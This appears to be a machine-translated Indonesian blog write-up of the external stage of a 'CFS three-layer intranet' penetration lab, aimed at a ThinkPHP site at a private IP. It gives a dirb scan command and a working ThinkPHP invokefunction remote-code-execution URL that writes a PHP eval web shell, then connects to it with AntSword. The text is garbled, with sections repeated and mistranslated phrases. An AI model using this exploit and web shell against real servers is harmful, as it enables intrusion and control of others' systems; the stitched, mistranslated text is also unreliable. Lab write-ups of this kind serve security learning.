Penetrasi intranet tiga lapis CFS - manajemen jaringan eksternal (1)

Manajemen jaringan eksternal penetrasi intranet tiga lapis CFS (1)

2024-07-12

Daftar isi

Mari kita ledakkan dulu untuk melihat apakah ada cara untuk menyerang.

Saya mencoba jalur yang mencurigakan dan menemukan bahwa itu adalah kerangka thinkphp. Saya juga tahu versinya, jadi mari kita bertarung di hari berikutnya.

menulis ke php

Edit dan tulis ke php berhasil, cukup dapatkan pada hari berikutnyaEdit

Pedang semut, coba tautannya

Berhasil dikelola

Manajemen jaringan eksternal

Mari kita ledakkan dulu untuk melihat apakah ada cara untuk menyerang.

Anda dapat mencoba dirsearch, dirb, gobuster dan alat lainnya

dirb http://192.168.20.130/

Saya mencoba jalur yang mencurigakan dan menemukan bahwa itu adalah kerangka thinkphp. Saya juga tahu versinya, jadi mari kita bertarung di hari berikutnya.

menulis ke php

http://192.168.20.130/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>

Berhasil ditulis ke php, mudah mendapatkannya.

http://192.168.20.130/public/shell.php

Berbagi teknologi

Manajemen jaringan eksternal penetrasi intranet tiga lapis CFS (1)

Manajemen jaringan eksternal

Mari kita ledakkan dulu untuk melihat apakah ada cara untuk menyerang.

Saya mencoba jalur yang mencurigakan dan menemukan bahwa itu adalah kerangka thinkphp. Saya juga tahu versinya, jadi mari kita bertarung di hari berikutnya.

menulis ke php

Berhasil ditulis ke php, mudah mendapatkannya.

Pedang semut, coba tautannya

Berhasil dikelola

Profil pribadi

informasi kontak saya